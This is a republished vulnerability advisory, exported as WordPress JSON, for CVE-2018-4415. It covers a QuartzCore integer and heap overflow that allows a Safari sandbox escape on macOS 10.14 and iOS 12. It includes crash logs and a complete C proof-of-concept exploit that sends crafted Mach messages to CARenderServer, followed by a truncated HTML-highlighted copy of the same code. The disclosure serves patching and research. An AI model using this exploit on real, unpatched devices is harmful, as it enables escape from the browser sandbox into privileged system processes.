{"id":13976,"date":"2018-12-02T14:19:07","date_gmt":"2018-12-02T22:19:07","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/12\/02\/news-7743\/"},"modified":"2018-12-02T14:19:07","modified_gmt":"2018-12-02T22:19:07","slug":"news-7743","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/12\/02\/news-7743\/","title":{"rendered":"SSD Advisory \u2013 iOS\/macOS Safari Sandbox Escape via QuartzCore Heap Overflow"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron | Date: Sun, 02 Dec 2018 13:08:59 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> QuartzCore ( https:\/\/developer.apple.com\/documentation\/quartzcore ), also known as CoreAnimation, is a framework used by macOS and iOS to build an animatable scene graph. CoreAnimation uses a unique rendering model in which the graphics operations run in a separate process: on macOS that process is WindowServer, on iOS it is backboardd. Both of these processes are outside the sandbox and have the right to call setuid. The QuartzCore service is usually referred to as CARenderServer. It exists on both macOS and iOS and can be reached from the Safari sandbox, and it has therefore been used at Pwn2Own on many occasions. There is an integer overflow which can lead to a heap overflow in QuartzCore on the latest macOS\/iOS.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> &#8220;CoreAnimation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. 
CVE-2018-4415: Liang Zhuo working with Beyond Security\u2019s SecuriTeam Secure Disclosure&#8221;<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-4415<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Zhuo Liang, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3796\"><\/span><br \/> <strong>Affected systems<\/strong><br \/> macOS 10.14<br \/> iOS 12.10<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The root cause of this vulnerability lies in the QuartzCore function CA::Render::InterpolatedFunction::InterpolatedFunction, which does not account for integer overflow. The following sections discuss the details of this vulnerability on both macOS and iOS.<\/p>\n<p><strong>macOS 10.14<\/strong><br \/> On macOS there is a useful API, CGSCreateLayerContext (it does not exist on iOS), for opening a connection to CARenderServer. The attacker can then send messages to the service port with message id 0x9C42 or 0x9C43. When the process (the server_thread, to be precise) receives a message with one of these ids, it enters a deserialization-like procedure. 
With suitably crafted data, execution reaches the function CA::Render::InterpolatedFunction::InterpolatedFunction.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/apple-sandbox-escape-macOS.14.png\" data-slb-active=\"1\" data-slb-asset=\"1158156125\" data-slb-internal=\"0\" data-slb-group=\"3796\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3797\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/apple-sandbox-escape-macOS.14-300x259.png\" alt=\"\" width=\"598\" height=\"516\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/apple-sandbox-escape-macOS.14-300x259.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/apple-sandbox-escape-macOS.14.png 574w\" sizes=\"auto, (max-width: 598px) 100vw, 598px\" \/><\/a><\/p>\n<p>Notice at (a) and (b) that the values of these two members are attacker-controlled (CA uses functions such as CA::Render::Decoder::decode* to deserialize objects); in the CA::Render::InterpolatedFunction::allocate_storage function these values decide the size of the memory to be allocated.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/Apple-sandbox-Escape-listing2.png\" data-slb-active=\"1\" data-slb-asset=\"1087547554\" data-slb-internal=\"0\" data-slb-group=\"3796\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3798\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/Apple-sandbox-Escape-listing2-300x223.png\" alt=\"\" width=\"595\" height=\"442\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/Apple-sandbox-Escape-listing2-300x223.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/12\/Apple-sandbox-Escape-listing2.png 569w\" sizes=\"auto, (max-width: 595px) 100vw, 595px\" \/><\/a><\/p>\n<p>At (d), v3 is derived from the values at (a) and (b), and v4 at (e) is likewise controlled by the attacker through (c). 
So the size of the memory to allocate is 4 * (v4 + v3). But look at (f) carefully: the third parameter passed to CA::Render::Decoder::decode_bytes is actually 4 * v3. In its simplest form, CA::Render::Decoder::decode_bytes at (f) behaves like memcpy(v2, v8, 4 * v3) or memset(v2, 0, 4 * v3). So the heap overflow caused by the integer overflow happens when 4 * (v4 + v3) overflows but 4 * v3 does not. A combination of attacker-controlled values that produces such an overflow can be found in the exploit at the end of this advisory.<\/p>\n<p>Reproduction of this issue on macOS can be done as follows:<br \/> 1. clang QuartzCoreFunctionIntOverFlow.c -o quartz_core_function_over_flow -framework CoreGraphics<br \/> 2. .\/quartz_core_function_over_flow<\/p>\n<p>Crash log on macOS (WindowServer):<\/p>\n<div id=\"crayon-5c045a5ab3036745693342\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">Thread 0 Crashed:: Dispatch queue: com.apple.main-thread\ncom.apple.CoreFoundation 0x00007fff332e2daf __CFBasicHashAddValue + 2077\ncom.apple.CoreFoundation 0x00007fff332e33f5 CFDictionarySetValue + 187\ncom.apple.SkyLight 0x00007fff595ebfa9 CGXPostPortNotification + 123\ncom.apple.SkyLight 0x00007fff595eb947 notify_handler + 73\ncom.apple.SkyLight 0x00007fff595eb2d9 post_port_data + 237\ncom.apple.SkyLight 0x00007fff595eafba run_one_server_pass + 949\ncom.apple.SkyLight 0x00007fff595eab90 CGXRunOneServicesPass + 460\ncom.apple.SkyLight 0x00007fff595eb820 server_loop + 96\ncom.apple.SkyLight 0x00007fff595eb7b5 SLXServer + 1153\nWindowServer 0x000000010011d4c4 0x10011c000 + 5316\nlibdyld.dylib 0x00007fff6036ced5 start + 1\n\nThread 2:: com.apple.coreanimation.render-server \/\/ CARenderServer thread\nlibsystem_platform.dylib 0x00007fff6056ce09 _platform_bzero$VARIANT$Haswell + 41\ncom.apple.QuartzCore 0x00007fff3e8ebaa4 CA::Render::Decoder::decode_bytes(void*, unsigned long) + 46\ncom.apple.QuartzCore 0x00007fff3e8c35f7 CA::Render::InterpolatedFunction::InterpolatedFunction(CA::Render::Decoder*) + 191\ncom.apple.QuartzCore 0x00007fff3e8c3524 CA::Render::Function::decode(CA::Render::Decoder*) + 224\ncom.apple.QuartzCore 0x00007fff3e8ecb8a CA::Render::Decoder::decode_object(CA::Render::Type) + 946\ncom.apple.QuartzCore 0x00007fff3e8edc8e CA::Render::decode_commands(CA::Render::Decoder*) + 871\ncom.apple.QuartzCore 0x00007fff3e896422 CA::Render::Server::ReceivedMessage::run_command_stream() + 748\ncom.apple.QuartzCore 0x00007fff3e73d2e1 CA::Render::Server::server_thread(void*) + 1841\ncom.apple.QuartzCore 0x00007fff3e91427c thread_fun(void*) + 25\nlibsystem_pthread.dylib 0x00007fff60572795 _pthread_body + 159\nlibsystem_pthread.dylib 0x00007fff605726e2 _pthread_start + 70\nlibsystem_pthread.dylib 0x00007fff605722a9 thread_start + 13<\/textarea><\/div>\n<\/div>\n<p><strong>iOS 12.10<\/strong><br \/> Since the root cause of this issue is apparent and the code on iOS and macOS is almost the same, this section discusses only the points on which iOS differs from macOS.<\/p>\n<p>\u2022 iOS has no API like macOS\u2019s CGSCreateLayerContext that returns the CoreAnimation rendering context directly, but through exploration we found that the MIG function _XRegisterClient can be used in its place. First, the attacker opens the service com.apple.CARenderServer (reachable from the sandbox), and then calls _XRegisterClient via mach_msg with message id 40202.<br \/> \u2022 To reproduce this issue on iOS 12 beta, use the latest Xcode-beta (for the latest SDK).<br \/> \u2022 Import the IOKit framework headers as described at www.malhal.com. 
Note that the destination directories should be changed to those of your Xcode-beta application.<br \/> \u2022 The code lives in the application:didFinishLaunchingWithOptions: method and is triggered when the application starts.<br \/> \u2022 Once the application has been installed, just start the application ios-sbe.<\/p>\n<p>Crash log on iOS:<\/p>\n<div id=\"crayon-5c045a5ab303f993112620\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">Thread 3 name: com.apple.coreanimation.render-server \/\/ CARenderServer thread\nThread 3:\n0 libsystem_platform.dylib 0x000000018fefe584 0x18fef6000 + 34180\n1 QuartzCore 0x0000000194a6e1d4 0x19491e000 + 1376724\n2 QuartzCore 0x0000000194a21a58 0x19491e000 + 1063512\n3 QuartzCore 0x0000000194a710b8 0x19491e000 + 1388728\n4 QuartzCore 0x0000000194a719c0 0x19491e000 + 1391040\n5 QuartzCore 0x00000001949fb140 0x19491e000 + 905536\n6 QuartzCore 0x00000001949facdc 0x19491e000 + 904412\n7 QuartzCore 0x0000000194ab65c8 0x19491e000 + 1672648\n8 libsystem_pthread.dylib 0x000000018ff0c26c 0x18ff01000 + 45676\n9 libsystem_pthread.dylib 0x000000018ff0c1b0 0x18ff01000 + 45488\n10 libsystem_pthread.dylib 0x000000018ff0fd20 0x18ff01000 + 60704\n\nThread 13 name: Dispatch queue: com.apple.libdispatch-manager\nThread 13 Crashed:\n0 libdispatch.dylib 0x000000018fd18514 0x18fcca000 + 320788\n1 libdispatch.dylib 0x000000018fd1606c 0x18fcca000 + 311404\n2 libdispatch.dylib 0x000000018fd1606c 0x18fcca000 + 311404\n3 libdispatch.dylib 0x000000018fd0f1ac 0x18fcca000 + 283052\n4 libsystem_pthread.dylib 0x000000018ff0d078 0x18ff01000 + 49272\n5 libsystem_pthread.dylib 0x000000018ff0fd18 0x18ff01000 + 60696<\/textarea><\/div>\n<\/div>\n<p><strong>Exploit<\/strong><\/p>\n<div id=\"crayon-5c045a5ab3043485934892\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco 
crayon-os-pc print-yes notranslate\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">\/**\n *  Brief: Integer overflow in CoreAnimation, CVE-2018-4415\n *  Usage:\n *    1. clang FunctionIntOverFlow.c -o function_over_flow\n *    2. .\/function_over_flow\n *\n *  Specifically, `CA::Render::InterpolatedFunction::allocate_storage` function in QuartzCore does\n *  not do any check for integer overflow in expression |result = (char *)malloc(4 * (v4 + v3));|.\n *\n *  The bug has been fixed in macOS 10.14.1 and iOS 12.1, since the interfaces and structure of\n *  messages are inconsistent between different versions, this PoC may only work on macOS 10.14 and\n *  iOS 12.0, but it's very easy to replant it to another versions.\n *\n *  Tips for debugging on macOS: Turn Mac to sleep mode and ssh to the target machine, this may\n *  help you concentrate on your work.\n *\n *  One more: Mach service com.apple.CARenderServer is reachable from Safari sandbox on both macOS\n *  and iOS. com.apple.windowserver.active accurately on macOS versions prior to macOS 10.14.\n *\/\n\n#include &lt;dlfcn.h&gt;\n#include &lt;mach\/mach.h&gt;\n#include &lt;stdio.h&gt;\n#include &lt;string.h&gt;  \/\/ memset\n#include &lt;unistd.h&gt;\n\nstatic void do_int_overflow() {\n\n    mach_port_t p = MACH_PORT_NULL, bs_port = MACH_PORT_NULL;\n    task_get_bootstrap_port(mach_task_self(), &amp;bs_port);\n    const char *render_service_name = \"com.apple.CARenderServer\";\n    kern_return_t (*bootstrap_look_up)(mach_port_t, const char *, mach_port_t *) =\n        dlsym(RTLD_DEFAULT, \"bootstrap_look_up\");\n    kern_return_t kr = bootstrap_look_up(bs_port, render_service_name, &amp;p);\n\n    if (kr != KERN_SUCCESS) {\n        printf(\"[-] Cannot get service of %s, %s!\\n\", render_service_name, mach_error_string(kr));\n        return;\n    }\n\n    typedef struct quartz_register_client_s quartz_register_client_t;\n    struct quartz_register_client_s {\n        mach_msg_header_t header;\n        uint32_t body;\n        mach_msg_port_descriptor_t ports[4];\n        char padding[12];\n    };\n\n    quartz_register_client_t msg_register;\n    memset(&amp;msg_register, 0, sizeof(msg_register));\n    msg_register.header.msgh_bits =\n        MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE) |\n        MACH_MSGH_BITS_COMPLEX;\n    msg_register.header.msgh_remote_port = p;\n    msg_register.header.msgh_local_port = mig_get_reply_port();\n    msg_register.header.msgh_id = 40202;  \/\/ _XRegisterClient\n\n    msg_register.body = 4;\n    msg_register.ports[0].name = mach_task_self();\n    msg_register.ports[0].disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg_register.ports[0].type = MACH_MSG_PORT_DESCRIPTOR;\n    msg_register.ports[1].name = mach_task_self();\n    msg_register.ports[1].disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg_register.ports[1].type = MACH_MSG_PORT_DESCRIPTOR;\n    msg_register.ports[2].name = mach_task_self();\n    msg_register.ports[2].disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg_register.ports[2].type = MACH_MSG_PORT_DESCRIPTOR;\n    msg_register.ports[3].name = mach_task_self();\n    msg_register.ports[3].disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg_register.ports[3].type = MACH_MSG_PORT_DESCRIPTOR;\n\n    kr = mach_msg(&amp;msg_register.header, MACH_SEND_MSG | MACH_RCV_MSG,\n                  sizeof(quartz_register_client_t), sizeof(quartz_register_client_t),\n                  msg_register.header.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);\n    if (kr != KERN_SUCCESS) {\n        printf(\"[-] Send message failed: %s\\n\", mach_error_string(kr));\n        return;\n    }\n\n    mach_port_t context_port = *(uint32_t *)((uint8_t *)&amp;msg_register + 0x1c);\n    uint32_t conn_id = *(uint32_t *)((uint8_t *)&amp;msg_register + 0x30);\n\n    typedef struct quartz_function_int_overflow_s quartz_function_int_overflow_t;\n    struct quartz_function_int_overflow_s {\n        mach_msg_header_t header;\n        char msg_body[0x60];\n    };\n\n    quartz_function_int_overflow_t function_int_overflow_msg = {0};\n    function_int_overflow_msg.header.msgh_bits =\n        MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;\n    function_int_overflow_msg.header.msgh_remote_port = context_port;\n    function_int_overflow_msg.header.msgh_id = 40002;\n\n    memset(function_int_overflow_msg.msg_body, 0x0, sizeof(function_int_overflow_msg.msg_body));\n    *(uint32_t *)(function_int_overflow_msg.msg_body + 0) = 0x1;  \/\/ Ports count\n\n    \/**\n     *\t1. One port consumes 12B space\n     *\t2. This `mach_msg` routine does not need a port, so set this port to MACH_PORT_NULL (memory\n     *\t   cleared by memset)\n     *\/\n\n    *(uint32_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 0) = 0xdeadbeef;\n    *(uint32_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 4) = conn_id;\n    *(int8_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16) = 2;\n    *(uint64_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 1) = 0xdeadbeefdeadbeef;\n    *(uint32_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 9) = 0xffffffff;\n\n    *(uint8_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 13) = 0x12;  \/\/ Decode Function\n    *(uint8_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 14) = 0x2;\n    \/**(uint32_t*)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 15) = 0xDECAFBAD;*\/\n    *(uint64_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 15) = 0x2000000000000000;\n    *(uint32_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 23) = 1;\n    *(uint32_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 27) = 2;\n    *(uint8_t *)(function_int_overflow_msg.msg_body + 4 + 12 + 16 + 31) = 1;\n\n    kr = mach_msg(&amp;function_int_overflow_msg.header, MACH_SEND_MSG,\n                  sizeof(function_int_overflow_msg), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);\n    if (kr != KERN_SUCCESS) {\n        printf(\"[-] Send message failed: %s\\n\", mach_error_string(kr));\n        return;\n    }\n\n    return;\n}\n\nint main() {\n    do_int_overflow();\n    return 0;\n}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table 
class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-1\"><span class=\"crayon-c\">\/**<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-2\"><span class=\"crayon-c\"> *&nbsp;&nbsp;Brief: Integer overflow in CoreAnimation, CVE-2018-4415<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-3\"><span class=\"crayon-c\"> *&nbsp;&nbsp;Usage:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-4\"><span class=\"crayon-c\"> *&nbsp;&nbsp;&nbsp;&nbsp;1. clang FunctionIntOverFlow.c -o function_over_flow<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-5\"><span class=\"crayon-c\"> *&nbsp;&nbsp;&nbsp;&nbsp;2. 
.\/function_over_flow<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-6\"><span class=\"crayon-c\"> *<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-7\"><span class=\"crayon-c\"> *&nbsp;&nbsp;Specifically, `CA::Render::InterpolatedFunction::allocate_storage` function in QuartzCore does<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-8\"><span class=\"crayon-c\"> *&nbsp;&nbsp;not do any check for integer overflow in expression |result = (char *)malloc(4 * (v4 + v3));|.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-9\"><span class=\"crayon-c\"> *<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-10\"><span class=\"crayon-c\"> *&nbsp;&nbsp;The bug has been fixed in macOS 10.14.1 and iOS 12.1, since the interfaces and structure of<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-11\"><span class=\"crayon-c\"> *&nbsp;&nbsp;messages are inconsistent between different versions, this PoC may only work on macOS 10.14 and<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-12\"><span class=\"crayon-c\"> *&nbsp;&nbsp;iOS 12.0, but it&#8217;s very easy to replant it to another versions.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-13\"><span class=\"crayon-c\"> *<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-14\"><span class=\"crayon-c\"> *&nbsp;&nbsp;Tips for debugging on macOS: Turn Mac to sleep mode and ssh to the target machine, this may<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-15\"><span class=\"crayon-c\"> *&nbsp;&nbsp;help you concentrate on your work.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-16\"><span 
class=\"crayon-c\"> *<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-17\"><span class=\"crayon-c\"> *&nbsp;&nbsp;One more: Mach service com.apple.CARenderServer is reacheable from Safari sandbox on both macOS<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-18\"><span class=\"crayon-c\"> *&nbsp;&nbsp;and iOS. com.apple.windowserver.active accurately on macOS versions prior to macOS 10.14.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-19\"><span class=\"crayon-c\"> *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-21\"><span class=\"crayon-p\">#include &lt;dlfcn.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-22\"><span class=\"crayon-p\">#include &lt;mach\/mach.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-23\"><span class=\"crayon-p\">#include &lt;stdio.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-24\"><span class=\"crayon-p\">#include &lt;unistd.h&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-26\"><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">do_int_overflow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-28\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">mach_port<\/span><span class=\"crayon-sy\">_<\/span>t<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_PORT_NULL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bs_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_PORT_NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">task_get_bootstrap_port<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">mach_task_self<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">bs_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">render_service_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"com.apple.CARenderServer\"<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">kern_return_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">bootstrap_look_up<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">mach_port_t<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mach_port_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">dlsym<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">RTLD_DEFAULT<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">\"bootstrap_look_up\"<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">kern_return_t <\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bootstrap_look_up<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bs_port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">render_service_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">KERN_SUCCESS<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">\"[-] Cannot get service of %s, %s!\\n\"<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">render_service_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_error_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" 
